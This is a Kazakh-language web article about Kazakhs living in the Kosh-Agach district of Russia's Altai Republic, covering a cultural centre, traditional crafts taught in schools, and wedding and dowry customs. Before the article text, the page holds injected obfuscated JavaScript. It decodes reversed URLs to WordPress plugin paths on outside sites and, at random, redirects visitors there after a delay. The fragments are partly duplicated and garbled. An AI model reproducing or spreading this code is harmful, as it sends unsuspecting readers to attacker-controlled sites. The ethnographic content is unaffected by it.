Алтайдағы қазақтар

SHAMAN_95ae159a$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/SHAMAN_95ae159a.jpg» width=»223″ height=»164″ />Тарихи жазбаларда «Шүй қазақтары» деп аталып келген Ресейдің Алтай Республикасындағы Қосағаш ауданына қазақтар ХІХ ғасырдың соңына жақын қоныстанған екен. Ал, негізгі туған жерлері – Шығыс Қазақстан. Тағдырдың тәлкегімен алғашқыда Моңғолияға көшіп, кейіннен Алтай өңірін мекен еткен. Ресейдің Алтай Республикасында 160 мың халық болса, соның 17 мыңнан астамы Қосағаш ауданының тұрғыны, оның 10 мыңдайы қазақ. Алтай өңірінде 15 мыңдай қазақ бар. Олар алтай және орыс халқымен бірге өмір сүріп келеді. Қосағаштағы қандастарымыз Қазақстаннан тыс тіршілік кешіп жатса да, ұлтымыздың ежелгі әдет-ғұрпы мен салт-дәстүрін, қолөнеріміздің қаймағын бұзбай, сақтап қалған.

Қосағаш ауданындағы «Мирас» атты қазақ мәдени орталығының төрайымы  Бесайдар Алашқызы Жатқамбаева  —  сол жердегі мектептердің бірінде еңбек сабағы бойынша 16 жылдай оқушыларды ұлттық үрдіске баулыған, нағыз ұлтжанды азамат. «Достық» үйінің директоры ретінде де  қандастарымыздың ұлттық салт-дәстүрін сақтап қалуға бар күш жігерін салуда.
— Біздің ауданда 12 мектеп бар,  бәрінде сабақ орысша жүргізіледі. Мен өзім «Жаңа ауыл» деп аталатын  ауылдағы орта мектепте қыздарға ең¬бек сабағын өтіп, оларды ұлттық салт-дәстүрге баулыдым. Яғни, ұмытылып бара жатқан ата-бабаларымыздан қалған қолөнерді жаңғыртып, әдет-ғұрыпты дәріптеу, ұлттық тағамдарды жасау жөніндегі өзімнің авторлық бағдарламамды ендіріп, сабақ бердім, —  дейді Бесайдар ханым. Оның авторлық бағдарламасы қазақтың ұлттық тағамдары, жүннен жасалатын бұйымдар, ұлттық ою-өрнек пен бізкесте, қол кесте, қыз-жігіттің қол тәрбиесі, дастархан мәзірін дайындау бөлімдерінен тұрады. Мақсат – қыздың тәрбиелі өсіп, кейін жақсы келін болуына ықпал ету. Қазақ қашан да қонақжай, дастарханы жиылмаған кең пейілді болғаны белгілі. Бесайдар ханым сол ұлттық үрдісті дастархан мәзірі арқылы да жалғастыруға қыздарды бейім¬дей білген. Сонымен бірге, қыздарды ұзатқанда ата-анасы беретін «қыз жасауын» қыздардың өздері жасауға, яғни, жүннен сырмақ, тұскиіз, арнайы төсекжапқыш, т.б. тігуге үйреткен.
Ол жас қыздарға қонақ күтудегі ұлттық дастархан мәзірін үйретуде өте тапқырлық  танытқан. Бұл туралы өзі былай дейді:
— Қазақ дәстүрі бойынша қонаққа табақ тартудың мәні жоғары екені белгілі. Мен осы мәселені былайша ұйымдастырдым: қойдың жіліктерін тазалап, бояп қойдым. Еңбек сабағы кезінде жіліктерді ортаға қойып, құда-құдағиға қандай жілік, қыз бен күйеуге, келінге қандай жілік тартылады, соны іс жүзінде көрсетіп, оны қыздардың өзіне қайта жасатып, үйреттім. Көзбен көріп, қолмен ұстап жасаған нәрсе ұмытылмайды деп, осындай әдісті қолдандым. Нәтижесі де жаман болған жоқ. Қазір менің осы әдісімді Қосағаш ауданындағы мектептердің бәрі пайдаланады.
Басқа елде аз санды болып тіршілік етіп жатқандықтан, негізгі мақсатымыз – қазақтың ұлттық әдет-ғұрпын, тілін, дінін сақтап, оны келешек ұрпаққа жеткізу. Себебі, жастайынан  осылай баулымасаң, есейе келе оларға ұлтымыздың осындай әдемі әдеті жат болады. Осы бағытта аудан орталығында  «Мирас» мәдени орталығын құрып, жұмыс жасап келеміз. «Достық» үйінде алтай, орыс, қазақ мәдени орталықтары бар. «Мирас» қазақ мәдени орталығы қазір қазақ тілі мұғалімдерімен тығыз байланысып, қазақи намысы бар жастармен бірлесіп, көптеген іс-шаралар өткізіп тұрады. Өзім сол үш мәдени орталықтың басын құраған «Достық» үйінің директорымын. Мұнда 20-дан астам адам еңбек етсе, соның 11-і қазақ мәдени орталығының құрамына кіреді. Олар бюджет есебінен айлық алады.
Қосағаштық қазақтар, әсіресе, мал шаруашылығына байланысты қолөнерді сақтап қалған, оны бүгінгі күні дамытып отыр. Соның бірі – жүннен сырмақ дайындау кең етек алған. Жүнді бояп, түтіп, сабап, одан киіз басып алып, қазақи оюмен әшекейлеп, беттестіріп тігіп, түрлі пішінде сырмақ тігу алтайлық қазақ әйелдерінің қалыптасқан, күнделікті шұғыл-данатын тіршілігі. Біздің ел¬дегі жұмыссызбыз деген қыз-келіншектерге Алтайдағы қан-дастарымыздың бұл іс-әрекеті үлгі боларлық екен деп ойладық. Алтай өңіріндегі ағайындарымыз негізінен мал шаруашылығымен шұғылданады.
Әр үйде орта есеппен алатын болсақ, 100-ден астам қойы, 30-ға жуық ешкісі, он шақты сиыры, 10-нан астам жылқысы бар. Бұл – орта шаруадағы отбасының мал есебі. Негізінде жылқы-қойлары бұдан да көптері баршылық. Өйткені, климаты мал бағуға ыңғайлы. Жеміс-жидек, бақшалық өсімдіктер өспейді. Табиғаты қатаң, қыста 50 градусқа дейін күн суытып, бораны ұйытқиды.
Қыз жасауы
Алтай қазақтарында қызын тұрмысқа бергенде жүннен да¬йындалатын сырмақ, тұскиіз, т.б. осы секілді заттарды жасап беру дәстүрі мықты қалыптасқан. Сырмақты әрбір ана өзі дайындауы шарт. Қанша қызы болса, сонша қызына «қыз жасауына» осындай қолөнер бұйымдарын жасап беруі әрбір әйелдің міндетті парызы есептеледі.
Қыздың жасауына берілетін сырмақтар мен тұскиіздерге ою-өрнек бізкестемен әшекейленіп тігіледі. Сондай-ақ, шымылдық, төсек-орын дайындалады. Киіз төсек дегені жүннен дайындалады. Оның дайындалуында да біз біле бермейтін ерешеліктер бар. Яғни, 2-3 қабат киізді беттестіріп тігіп, оның шеті барқыт матамен көмкеріліп, бүріледі де, беті қолмен біз-кестемен кестеленеді. Бұл – біздің қазіргі «матрац» деп атап кеткен төсенішіміздің қазақша тәсілмен дайындалуы. Бұндай киіз төсек-«матрац» қыз бен күйеуге жеке-жеке арнайы жасалады. Біздің қазақ неткен ақылды халық. Бұндай табиғи өнімнен жасалған төсектің денсаулыққа пайдасын айтпайсыз ба?!
Қыздың кебеже-сандығы да қазақтың ою-өрнегімен әшекейленіп жасалады. Бұл кебеже-сандықтың астына оюланған жүкаяқ та қойылады. Кебеженің бірінің ішіне қыздың киім-кешегі, екіншісіне ыдыс-аяқтары салынады. Іс тігетін машине қыз жасауына міндетті түрде беріледі.
Тіл-көзден сақтасын деп үкі тағатын қазақтың ежелгі дәстүрі де мұндағы қандастарда әлі күнге дейін жақсы сақталған. 12 метр ашық қызыл торғыннан шымылдық тігіліп, оның беті-не және тұскиіздің үстіне де маржандап, үш жерден үкі қадалады. Қыз жасауына қазіргі заманның да қанша қымбат бағалы бұйымдары берілгенімен, қазақтың осы ұлттық қолөнер туындыларының орны Алтайдағы қазақтарда ерекше.
— Қыз жасауында ата-бабаларымыздан жалғасып келе жатқан осындай қолөнер бұйымдары апарылмаса, пәленбай мың долларлық шетелдік жиһаз қыз жасауы деп есептелінбейді. Егер жоғарыда айтып өткен бұйымдарды апармаса, құда жақтың адамдары: «Қызына сырмақ басып, тұскиіз тігіп бере алмаса, неге ана болып жүр?» деп, қыздың анасының үстінен күлсе, ал ағайын, абысын-ажындары сөгеді. Сондай сөзді естімеу үшін әрбір ана қызы бой жетіп келе жатқаннан қыз жасауына қамданады.
Келін түсірген жақ ауылдың барша әйелдерін жинап, қыз¬дың жасауын ортаға жайып, көрсетеді. Оған қызды ұзатып барған 30-40 шақты әйел қо¬сы¬¬лады. Қыздың қандай өнері бар екені, міне, осы жерде байқалады. Демек, шешесі істеген жасауды кейін қызы да өз перзентіне жасай алады деген ұғым осы жерде пайда болады. Сондықтан, осынша¬ма әйел жиналып, көріп, сынап отырғанда, бетінен оты шығып ұялмау үшін әрбір әйел қыз жасауына қатты мән береді.
Ондағы жастар ата жолымен құда болып та, алып қашып та үйлене береді. Бірақ алып қашу дәстүрі кең етек алған. Қалың мал деген жоқ. Бірақ қыз жаса¬уын алып барған әйелдерге өз жолымен жағалы киім, бағалы мата, алтын бұйымдар беріп қайтарады.
Келін түсіру
Қыз бала келін боп, күйеу жігіттің босағасын аттаған шағында, оның алдынан көп балалы, елге сыйлы ана шығып, ақ батасын береді. Келіннің басына орамал салып, оның үстінен қызыл ала желек жабады, бетін бүркеп, отқа май құйдырып, оң аяғымен босағадан аттатып, үйдің оң жақ бұрышына кіргізеді. Ол жерге сары ала сырмақ төсеп, қызыл шымылдық құрылады. Келін сол шымылдықтың ішінде той өткенге дейін отыруы тиіс. Оның жанында қайын сіңлілері мен ауыл қыздары отырады.
Тойда беташар рәсімі жасалып, келін бүкіл ағайын-туыстарына сәлем салады. Көпшілік алдында келінге қайын ағаларының, қайындары мен қайын сіңлілерінің атын атап береді. Оларды өз атымен атамау үшін келіннің өзіне жаңа ат қойғызады. Оған жиналғандар куә болып естіп тұрады. Келін сол тойда өзі қойып шыққан атынан жаңылмай, кейін сол аттармен атауы тиіс.
Келінді алып қашып келген соң, оның ата-анасына «ашу басар» қоржын жіберіледі. Одан ары қарай құдалардың ортасында болатын алыс-беріс дәстүрі бұрынғыдай қазақи жолмен жалғаса береді.
«Ашу басар» қоржында қойдың еті үйітілген басымен тұтас салынады да, бір тегеш бауырсақ, тәттісі, құрт-ірімшігімен, барқыт, астарлық, көйлектік, ақ мата – шылауыштық, барлығы 5 метрден (кимешек үстінен байланатын, үлкен ақ шаршы орамал) қайткен күнде де салынады, бұрышына ақша түйіледі. Дәл осындай заттармен толтырылған қоржын қыз әкесінің қанша туған ағайыны болса, сонша үйге жеке-жеке жіберіледі.
Той тек күйеу жақта болып, тойға келген құдаларға берілетін сый-сияпаттың, жол-жоралғының бәрі жасалады. Яғни, құдаға тиесілі жағалы киімдер, бағалы сыйлықтар беріледі.
Қыз ұзату
Келінді алып қашып келген соң, құда түсу дәстүрі кейін жасалады. Яғни, күйеу жігіт жағы өз тойынан кейін қыздың ауылына «күйеу түсу» дәстүрімен келеді. Бұнда күйеу қалыңдығына арналған маңдайына үкі таққан атын жетектеп, ата-анасын, күйеу жолдастарын ертіп, 7-8 адам көлемінде үйіне келеді. Бұл келісінде «құда қоржын» әкеледі. «Құда қоржынның» іші де дәл «ашу басар» қоржындай толтырылады. Қыз жақ құдаларды күтіп алып, кейін жігіттің жұртта қалған басқа ағайын-туыстарының бәрін шақырады. Мұның өзі бір той есебінде өтеді. Бұл жақта да киіт кигізіліп, алтын бұйымдар беріледі.
Қызға төркін жағы жетекке бір ат, бұзаулы сиыр, он шақты қой-ешкі, тұрмыстары жақсылар одан да көп малды алдына салып береді.
Қыз жасауына төсектен бас¬тап, үйге қажетті бұйымдарды, оған қосымша күйеу жігіттің әр ағайынының үйіне 5 сырмақ, 4 кілемнен «ілу» апарады. Сол үшін қыз жасауында кем дегенде 20 шақты сырмақ болуы шарт. Құдалар ағайындардың үйіне қыдырмай, бір үйден қайтады.

Гүлнар Байжанова
Шымкент-Алтай Республикасы-Шымкент{jcomments on}

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика